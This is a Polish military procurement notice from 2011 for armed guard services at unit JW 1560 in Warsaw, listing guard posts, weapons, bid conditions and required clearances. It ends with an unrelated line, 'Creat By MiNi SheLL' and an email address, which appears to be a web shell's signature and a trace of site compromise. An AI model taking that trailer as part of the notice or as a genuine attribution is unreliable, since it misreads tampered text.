.Ze względu na specyfikę przedmiotu zamówienia Zamawiający przewiduje wizję lokalną w miejscach realizacji przedmiotu zamówienia. Wizja lokalna odbędzie się po uprzednim zgłoszeniu Wykonawcy, w terminie ustalonym z Zamawiającym. Zgłoszenia chęci uczestnictwa w wizji lokalnej należy kierować do Pełnomocnika Dowódcy Jednostki Wojskowej 1560 ds. ochrony informacji niejawnych,  nr tel. 22 6 855 061, nr faksu 22 6 855 101, wraz z podaniem danych: nazwa i adres Wykonawcy oraz nr telefonu kontaktowego, nie później niż na 2 dni przed upływem terminu składania ofert. W uzasadnionych przypadkach Zamawiający wyznaczy inny termin wizji lokalnej, o którym powiadomi wszystkich Wykonawców zamieszczając stosowną informację na stronie internetowej Zamawiającego.
.Wizja lokalna obiektów, w których wykonywana będzie usługa ochrony - będzie możliwa do przeprowadzenia w obecności pełnomocnika ochrony lub komendanta ochrony Jednostki Wojskowej 1560; 
.W sprawie ustalenia terminu wizji lokalnej należy kontaktować się z:
Pełnomocnik ochrony JW1560 Warszawa -  wz. por. Rajmund BOGUSŁAWSKI tel.:(022) 6 855 061;
Komendant ochrony  JW. 1560 Warszawa - mł. chor. Andrzej PIETRZAK
tel.:(022) 6 855 061;
Ochrona poszczególnych kompleksów powinna być realizowana w systemie dyżurów portierskich, posterunków ochronnych, zewnętrznych, ruchomych (lub stałych), albo wystawianych doraźnie w sytuacjach szczególnych, oraz patroli doraźnych, interwencyjnych oraz ruchomych wystawianych ze składu zmiany, wspomaganych przez grupę interwencyjną Wykonawcy, a w szczególności:
.w kompleksie K - 6045 (kompleks koszarowy): 
a)dowódca ochrony - dyżurny nadzoru i monitoringu wszystkich posterunków kompleksów nr 6045 i 7046 - służba pełniona całodobowo, w systemie zmianowym 24 - godzinnym  (1 pracownik ochrony, wyposażony w broń palną krótką, amunicję do danego typu broni oraz środki przymusu bezpośredniego: ręczny miotacz gazu i kajdanki);
b)obsługa biura przepustek - portier - dyżur pełniony w dni powszednie 
w systemie 8 godzinnym, w godzinach ustalonych przez Dowódcę JW 1560 dla każdego z portierów (2 pracowników ochrony); 
c)posterunek ochronny, zewnętrzny, stały lub ruchomy, - służba pełniona całodobowo, w systemie zmianowym 24 - godzinnym, z częstotliwością zmiany na posterunku, określoną w -Instrukcji ochrony Jednostki Wojskowej 1560 zgodnie zInstrukcją o ochronie obiektów wojskowych  ( 2 pracowników ochrony wyposażonych w broń palną typu: karabinek lub pistolet maszynowy, amunicję do danego typu broni oraz środki przymusu bezpośredniego: ręczny miotacz gazu i kajdanki); 
d)posterunek ochronny, zewnętrzny, stały lub ruchomy, - służba pełniona całodobowo, w systemie zmianowym 24 - godzinnym, z częstotliwością zmiany na posterunku, określoną w Instrukcji ochrony Jednostki Wojskowej 1560 zgodnie z  Instrukcją o ochronie obiektów wojskowych  (2 pracowników ochrony wyposażonych w broń palną typu: karabinek lub pistolet maszynowy, amunicję do danego typu broni oraz środki przymusu bezpośredniego: ręczny miotacz gazu i kajdanki); 
e)posterunek ochronny, zewnętrzny, stały lub ruchomy, - służba pełniona całodobowo, w systemie zmianowym 24 - godzinnym, z częstotliwością zmiany na posterunku, określoną w Instrukcji ochrony Jednostki Wojskowej 1560 zgodnie z  Instrukcją o ochronie obiektów wojskowych  (2 pracowników ochrony wyposażonych w broń palną typu: karabinek lub pistolet maszynowy, amunicję do danego typu broni oraz środki przymusu bezpośredniego: ręczny miotacz gazu i kajdanki); 
f)posterunek ochronny, zewnętrzny, stały lub ruchomy, - służba pełniona całodobowo, w systemie zmianowym 24 - godzinnym, z częstotliwością zmiany na posterunku, określoną w Instrukcji ochrony Jednostki Wojskowej 1560 zgodnie z  Instrukcją o ochronie obiektów wojskowych (2 pracowników ochrony wyposażonych w broń palną typu: karabinek lub pistolet maszynowy, amunicję do danego typu broni oraz środki przymusu bezpośredniego: ręczny miotacz gazu i kajdanki); 
g)posterunek doraźny - wystawiany w przypadku konieczności okresowego wzmocnienia systemu ochrony kompleksu lub ochrony mienia w rejonie jego ewakuacji ( pracownik ochrony z bronią palną typu: karabinek lub pistolet maszynowy, amunicję do danego typu broni oraz środkami przymusu bezpośredniego: ręczny miotacz gazu i kajdanki), służba pełniona przez pracownika ochrony, niepełniącego aktualnie służby na posterunku;
.w kompleksie K - 7046 (skład MPS):
a)Pomocnik dowódcy ochrony - wartownik - służba pełniona całodobowo, 
w systemie zmianowym 24 - godzinnym  ( 1 pracownik ochrony, wyposażony 
w broń palną, typu: karabinek lub pistolet maszynowy, amunicję do danego typu broni oraz środki przymusu bezpośredniego: ręczny miotacz gazu i kajdanki);
b)posterunek ochronny, zewnętrzny, ruchomy, służba pełniona całodobowo, 
w systemie zmianowym 24 - godzinnym, z częstotliwością zmiany na posterunku, określoną w Instrukcji ochrony Jednostki Wojskowej 1560 zgodnie 
z Instrukcją o ochronie obiektów wojskowych( 1 pracownik ochrony, wyposażony w broń palną typu: karabinek lub pistolet maszynowy, amunicję do danego typu broni oraz środki przymusu bezpośredniego: ręczny miotacz gazu i kajdanki); 
c)posterunek doraźny - wystawiany w przypadku konieczności okresowego wzmocnienia systemu ochrony kompleksu lub ochrony mienia w rejonie jego ewakuacji ( pracownik ochrony z bronią palną typu: karabinek lub pistolet maszynowy, amunicję do danego typu broni oraz środkami przymusu bezpośredniego: ręczny miotacz gazu i kajdanki), służba pełniona przez pracownika ochrony, niepełniącego aktualnie służby na posterunku;
Dodatkowo:
.grupa interwencyjna na pojeździe osobowym lub osobowo - terenowym, składająca się z co najmniej 2 pracowników ochrony, wyposażonych w broń palną typu: pistolet lub rewolwer, amunicję do danego typu broni oraz środkami przymusu bezpośredniego: pałka służbowa, ręczny miotacz gazu i kajdanki), realizująca zadania wsparcia pracowników ochrony na wyszczególnionych powyżej kompleksach,  w sytuacjach naruszenia systemu ochrony oraz doraźnie w sytuacjach szczególnych lub zagrożenia, z czasem stawiennictwa nie przekraczającym 20 minut.
Szczegółowy Opis przedmiotu zamówienia znajduję się na stronie internetowej zamawiającego.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 05.01.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium w wysokości: 30 000,00 zł, zgodnie z wymaganiami określonymi w SIWZ</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana według formuły spełnia- nie spełnienia w oparciu o złożone w ofercie dokumenty i oświadczenia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana według formuły spełnia- nie spełnienia w oparciu o złożone w ofercie dokumenty i oświadczenia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana według formuły spełnia- nie spełnienia w oparciu o złożone w ofercie dokumenty i oświadczenia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana według formuły spełnia- nie spełnienia w oparciu o złożone w ofercie dokumenty i oświadczenia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana według formuły spełnia- nie spełnienia w oparciu o złożone w ofercie dokumenty i oświadczenia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pełnomocnictwo do podpisania oferty, jeśli to nie wynika z innych dokumentów dołączonych do oferty.
Dodatkowo:
1.Ważną koncesję wydaną przez Ministerstwo Spraw Wewnętrznych i Administracji na prowadzenie działalności w zakresie ochrony osób i mienia,
2.Ważne Świadectwo Bezpieczeństwa Przemysłowego I stopnia (pierwszego stopnia)
3.Wykaz wykonanych co najmniej trzech usług, o wartości zbliżonej do niniejszego zamówienia, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania  i odbiorców oraz załączenie dokumentów potwierdzających, że te usługi zostały wykonane należycie - według załącznika nr 5 do SIWZ.
4. Wykaz osób, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych , doświadczenia i wykształcenia niezbędnych do wykonywania zamówienia, rodzaju umowy o pracę, a także zakresu wykonywania przez nie czynności (dotyczy wszystkich  pracowników przewidzianych do realizacji zamówienia ).- według załącznika nr 6 do SIWZ.
5.Wymagane dokumenty dotyczące pracowników (zgodnie z Wykazem osób uczestniczących w wykonaniu zamówienia - zał. nr 6)
1)Osoba odpowiedzialna za merytoryczny oraz dyscyplinarny nadzór  i kierownictwo nad pracownikami zatrudnionymi do realizacji zamówienia - wymagane dokumenty 
a)  poświadczenie bezpieczeństwa osobowego, upoważniające do dostępu do informacji niejawnych, oznaczonych klauzulą co najmniej POUFNE
b) zaświadczenie o dobyciu przeszkolenia w zakresie ochronny informacji nie jawnych 
c) licencję ochrony osób i mienia II stopnia
d) pisemne upoważnienie Wykonawcy do kierowania oraz sprawowania nadzoru merytorycznego
2) Dowódca ochrony (pełnomocnik dowódcy ochrony) - wymagane dokumenty
a) pisemne upoważnienie wystawione przez Wykonawcę lub ważne poświadczenie bezpieczeństwa osobowego, upoważniające do dostępu do informacji niejawnych, oznaczonych klauzulą co najmniej ZASTRZEŻONE
b) zaświadczenie o dobyciu przeszkolenia w zakresie ochronny informacji nie jawnych 
c) licencję ochrony osób i mienia II stopnia
d)pozwolenia na broń krótką (pistolet lub rewolwer )
3) Pracownicy ochrony, pełniący służbę na posterunkach - wymagane dokumenty:
a)pisemne upoważnienie wystawione przez Wykonawcę lub ważne  poświadczenie bezpieczeństwa osobowego do dostępu do informacji niejawnych, oznaczonych klauzulą, co najmniej ZASTRZEŻONE.
b)zaświadczenia o odbyciu przeszkoleniu w zakresie ochrony informacji niejawnych,
c) licencję ochrony osób i mienia I stopnia
d) pozwolenie na broń długą, typu: karabinek lub pistolet maszynowy, 
4) Pracownicy ochrony - portierzy, pełniący służbę w biurze przepustek - wymagane dokumenty:
a)pisemne upoważnienie wystawione przez Wykonawcę lub ważne  poświadczenie bezpieczeństwa osobowego do dostępu do informacji niejawnych, oznaczonych klauzulą, co najmniej ZASTRZEŻONE.
b)zaświadczenia o odbyciu przeszkolenia w zakresie ochrony informacji niejawnych, 
6.Oświadczenie Wykonawcy potwierdzające posiadanie pełnomocnika ochrony przeszkolonego w zakresie ochrony informacji niejawnych przez służby ochrony Państwa 
7.Oświadczenie Wykonawcy o posiadaniu kancelarii tajnej oraz pomieszczenia umożliwiającego pracę z dokumentacją dotyczącą systemu ochrony obiektów wojskowych 
8.Oświadczenie Wykonawcy o utrzymaniu wyszczególnionych w dokumentach (powyżej) elementów organizacyjnych i osób funkcyjnych, przez cały okres realizacji zamówienia
9.Potwierdzenie wpłaty wadium</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.1blot.sp.mil.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Jednostka Wojskowa 4198,   00-909 Warszawa ul. Żwirki i Wigury 1C, 
budynek 51, pok. 16..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.12.2011 godzina 10:00, miejsce: Jednostka Wojskowa 4198,   00-909 Warszawa ul. Żwirki i Wigury 1C, 
budynek 51,  Kancelaria.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 60 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com